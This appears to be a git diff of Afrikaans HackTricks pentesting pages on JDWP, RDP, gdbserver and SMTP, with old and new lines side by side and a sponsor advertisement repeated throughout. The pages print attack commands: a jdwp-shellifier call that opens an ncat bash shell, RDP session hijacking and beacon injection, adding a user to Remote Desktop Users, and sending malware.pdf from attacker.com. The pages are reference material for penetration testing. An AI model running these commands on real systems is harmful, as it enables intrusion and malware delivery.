**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Exploiting ## Exploiting
JDWP eksplorasie hang af van die **protokol se gebrek aan outentisering en versleuteling**. Dit word oor die algemeen op **poort 8000** gevind, maar ander poorte is moontlik. Die aanvanklike verbinding word gemaak deur 'n "JDWP-Handshake" na die teikenpoort te stuur. As 'n JDWP-diens aktief is, antwoord dit met dieselfde string, wat sy teenwoordigheid bevestig. Hierdie handshake dien as 'n vingerafdrukmetode om JDWP-dienste op die netwerk te identifiseer. JDWP eksplorasie hang af van die **protokol se gebrek aan outentisering en versleuteling**. Dit word oor die algemeen op **poort 8000** gevind, maar ander poorte is moontlik. Die aanvanklike verbinding word gemaak deur 'n "JDWP-Handshake" na die teikenpoort te stuur. As 'n JDWP diens aktief is, antwoord dit met dieselfde string, wat sy teenwoordigheid bevestig. Hierdie handshake dien as 'n vingerafdrukmetode om JDWP dienste op die netwerk te identifiseer.
In terme van prosesidentifikasie, kan die soek na die string "jdwk" in Java prosesse 'n aktiewe JDWP-sessie aandui. In terme van prosesidentifikasie, kan die soek na die string "jdwk" in Java prosesse 'n aktiewe JDWP sessie aandui.
Die gereedskap van keuse is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Jy kan dit met verskillende parameters gebruik: Die gereedskap om te gebruik is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Jy kan dit met verskillende parameters gebruik:
```bash ```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
@ -78,7 +78,7 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html) * [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html) * [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.

View file

@ -13,9 +13,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -41,9 +41,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
<details> <details>
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Dadelijk beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -51,7 +51,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Deel hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %} {% endhint %}

View file

@ -15,7 +15,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
@ -68,9 +68,9 @@ rdp\_check.py van impacket laat jou toe om te kontroleer of sommige geloofsbriew
```bash ```bash
rdp_check <domain>/<name>:<password>@<IP> rdp_check <domain>/<name>:<password>@<IP>
``` ```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksplorasie-modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- en eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -92,7 +92,7 @@ Nou sal jy binne die geselekteerde RDP-sessie wees en jy sal 'n gebruiker moet n
**Belangrik**: Wanneer jy toegang tot 'n aktiewe RDP-sessie verkry, sal jy die gebruiker wat dit gebruik het, afskakel. **Belangrik**: Wanneer jy toegang tot 'n aktiewe RDP-sessie verkry, sal jy die gebruiker wat dit gebruik het, afskakel.
Jy kan wagwoorde uit die proses verkry deur dit te dump, maar hierdie metode is baie vinniger en laat jou toe om met die gebruiker se virtuele lessenaar te interaksie (wagwoorde in notepad sonder om op die skyf gestoor te word, ander RDP-sessies wat op ander masjiene oop is...) Jy kan wagwoorde uit die proses verkry deur dit te dump, maar hierdie metode is baie vinniger en laat jou toe om met die gebruiker se virtuele werkstasies te interaksie (wagwoorde in notepad sonder om op die skyf te stoor, ander RDP-sessies wat op ander masjiene oop is...)
#### **Mimikatz** #### **Mimikatz**
@ -109,7 +109,7 @@ Jy kan RDP's soek wat reeds met een van hierdie tegnieke teruggegaan is met: [ht
### RDP Proses Inspuiting ### RDP Proses Inspuiting
As iemand van 'n ander domein of met **beter regte aanmeld via RDP** op die rekenaar waar **jy 'n Admin is**, kan jy jou **beacon** in sy **RDP-sessie proses** inspuit en as hom optree: As iemand van 'n ander domein of met **beter regte aanmeld via RDP** op die PC waar **jy 'n Admin is**, kan jy jou **beacon** in sy **RDP-sessie proses** inspuit en as hom optree:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} {% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md) [rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
@ -123,14 +123,14 @@ net localgroup "Remote Desktop Users" UserLoginName /add
* [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn) * [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
**AutoRDPwn** is 'n post-exploitasie raamwerk geskep in Powershell, ontwerp hoofsaaklik om die **Shadow** aanval op Microsoft Windows rekenaars te outomatiseer. Hierdie kwesbaarheid (lys as 'n kenmerk deur Microsoft) laat 'n afstandaanvaller toe om **sy slagoffer se lessenaar sonder sy toestemming te sien**, en selfs dit op aanvraag te beheer, met behulp van gereedskap wat in die bedryfstelsel self ingebou is. **AutoRDPwn** is 'n post-exploitasie raamwerk geskep in Powershell, wat hoofsaaklik ontwerp is om die **Shadow** aanval op Microsoft Windows rekenaars te outomatiseer. Hierdie kwesbaarheid (lys as 'n kenmerk deur Microsoft) laat 'n afstandaanvaller toe om **sy slagoffer se lessenaar sonder sy toestemming te sien**, en selfs dit op aanvraag te beheer, met behulp van gereedskap wat in die bedryfstelsel self ingebou is.
* [**EvilRDP**](https://github.com/skelsec/evilrdp) * [**EvilRDP**](https://github.com/skelsec/evilrdp)
* Beheer muis en sleutelbord op 'n geoutomatiseerde manier vanaf die opdraglyn * Beheer muis en sleutelbord op 'n geoutomatiseerde manier vanaf die opdraglyn
* Beheer klembord op 'n geoutomatiseerde manier vanaf die opdraglyn * Beheer klembord op 'n geoutomatiseerde manier vanaf die opdraglyn
* Genereer 'n SOCKS-proxy vanaf die kliënt wat netwerkkommunikasie na die teiken via RDP kanale * Genereer 'n SOCKS-proxy vanaf die kliënt wat netwerkkommunikasie na die teiken via RDP kan lei
* Voer arbitrêre SHELL en PowerShell opdragte op die teiken uit sonder om lêers op te laai * Voer arbitrêre SHELL en PowerShell opdragte op die teiken uit sonder om lêers op te laai
* Laai lêers op en af na/vanaf die teiken selfs wanneer lêeroordragte op die teiken gedeaktiveer is * Laai lêers op en af na/vanaf die teiken selfs wanneer lêer oordragte op die teiken gedeaktiveer is
## HackTricks Outomatiese Opdragte ## HackTricks Outomatiese Opdragte
``` ```
@ -151,9 +151,9 @@ Name: Nmap
Description: Nmap with RDP Scripts Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP} Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
``` ```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -10,24 +10,24 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Deel hacking truuks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## **Basiese Inligting** ## **Basiese Inligting**
**gdbserver** is 'n gereedskap wat die foutopsporing van programme op afstand moontlik maak. Dit loop saam met die program wat foutopsporing benodig op dieselfde stelsel, bekend as die "teiken." Hierdie opstelling laat die **GNU Debugger** toe om van 'n ander masjien, die "gasheer," te verbind, waar die bronskode en 'n binêre kopie van die gefouteerde program gestoor word. Die verbinding tussen **gdbserver** en die debugger kan oor TCP of 'n seriële lyn gemaak word, wat veelsydige foutopsporingopstellings moontlik maak. **gdbserver** is 'n gereedskap wat die foutopsporing van programme op afstand moontlik maak. Dit loop saam met die program wat foutopsporing benodig op dieselfde stelsel, bekend as die "teiken." Hierdie opstelling laat die **GNU Debugger** toe om van 'n ander masjien, die "gasheer," te verbind, waar die bronskode en 'n binêre kopie van die gefouteerde program gestoor word. Die verbinding tussen **gdbserver** en die debugger kan oor TCP of 'n seriële lyn gemaak word, wat veelsydige foutopsporing opstellings moontlik maak.
Jy kan 'n **gdbserver laat luister op enige poort** en op die oomblik **kan nmap nie die diens herken nie**. Jy kan 'n **gdbserver laat luister op enige poort** en op die oomblik **kan nmap nie die diens herken nie**.
## Eksploitatie ## Exploitatie
### Laai op en Voer uit ### Laai op en Voer uit
@ -196,9 +196,9 @@ RemoteCmd()
``` ```
{% endcode %} {% endcode %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- en eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Dadelijk beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -212,7 +212,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %} {% endhint %}

View file

@ -6,7 +6,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
<details> <details>
<summary>Support HackTricks</summary> <summary>Ondersteun HackTricks</summary>
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
@ -15,15 +15,15 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## **Basiese Inligting** ## **Basiese Inligting**
Die **Simple Mail Transfer Protocol (SMTP)** is 'n protokol wat binne die TCP/IP suite gebruik word vir die **stuur en ontvang van e-pos**. Vanweë sy beperkings in die opstel van boodskappe aan die ontvanger se kant, word SMTP dikwels saam met **POP3 of IMAP** gebruik. Hierdie bykomende protokolle stel gebruikers in staat om boodskappe op 'n bediener se posbus te stoor en om dit periodiek af te laai. Die **Simple Mail Transfer Protocol (SMTP)** is 'n protokol wat binne die TCP/IP suite gebruik word vir die **verstuur en ontvang van e-pos**. Vanweë sy beperkings in die opstel van boodskappe aan die ontvanger se kant, word SMTP dikwels saam met **POP3 of IMAP** gebruik. Hierdie bykomende protokolle stel gebruikers in staat om boodskappe op 'n bediener se posbus te stoor en om dit periodiek af te laai.
In praktyk is dit algemeen dat **e-posprogramme** **SMTP gebruik om e-posse te stuur**, terwyl **POP3 of IMAP gebruik word om dit te ontvang**. Op stelsels wat op Unix gebaseer is, is **sendmail** die SMTP-bediener wat die meeste gebruik word vir e-posdoeleindes. Die kommersiële pakket bekend as Sendmail sluit 'n POP3-bediener in. Verder bied **Microsoft Exchange** 'n SMTP-bediener en bied die opsie om POP3-ondersteuning in te sluit. In praktyk is dit algemeen dat **e-posprogramme** **SMTP gebruik om e-posse te stuur**, terwyl **POP3 of IMAP gebruik word om dit te ontvang**. Op stelsels wat op Unix gebaseer is, is **sendmail** die SMTP-bediener wat die meeste gebruik word vir e-posdoeleindes. Die kommersiële pakket bekend as Sendmail sluit 'n POP3-bediener in. Verder bied **Microsoft Exchange** 'n SMTP-bediener en bied die opsie om POP3-ondersteuning in te sluit.
@ -55,7 +55,7 @@ nc -vn <IP> 25
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587 openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
``` ```
### Vind MX bedieners van 'n organisasie ### Vind MX-bedieners van 'n organisasie
```bash ```bash
dig +short mx google.com dig +short mx google.com
``` ```
@ -66,7 +66,7 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
``` ```
### NTLM Auth - Inligting openbaarmaking ### NTLM Auth - Inligting openbaarmaking
As die bediener NTLM-authentisering (Windows) ondersteun, kan jy sensitiewe inligting (weergawe) verkry. Meer inligting [**hier**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666). As die bediener NTLM-authentikasie (Windows) ondersteun, kan jy sensitiewe inligting (weergawe) verkry. Meer inligting [**hier**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
```bash ```bash
root@kali: telnet example.com 587 root@kali: telnet example.com 587
220 example.com SMTP Server Banner 220 example.com SMTP Server Banner
@ -79,9 +79,9 @@ NTLM supported
``` ```
Of **automate** dit met **nmap** plugin `smtp-ntlm-info.nse` Of **automate** dit met **nmap** plugin `smtp-ntlm-info.nse`
### Interne servernaam - Inligtingsontsluiting ### Interne bediener naam - Inligting openbaar
Sommige SMTP-bedieners voltooi outomaties 'n sender se adres wanneer die opdrag "MAIL FROM" gegee word sonder 'n volledige adres, wat sy interne naam openbaar: Sommige SMTP bedieners voltooi outomaties 'n sender se adres wanneer die opdrag "MAIL FROM" gegee word sonder 'n volledige adres, wat sy interne naam openbaar:
``` ```
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200 220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all EHLO all
@ -167,7 +167,7 @@ Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP> smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP> Nmap: nmap --script smtp-enum-users <IP>
``` ```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
@ -179,7 +179,7 @@ Nmap: nmap --script smtp-enum-users <IP>
## [Opdragte](smtp-commands.md) ## [Opdragte](smtp-commands.md)
### Stuur 'n E-pos vanaf linux-konsol ### Stuur 'n E-pos vanaf linux konsole
```bash ```bash
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used. Reading message body from STDIN because the '-m' option was not used.
@ -271,7 +271,7 @@ Van [Wikipedia](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework):
| Meganisme | Beskrywing | | Meganisme | Beskrywing |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
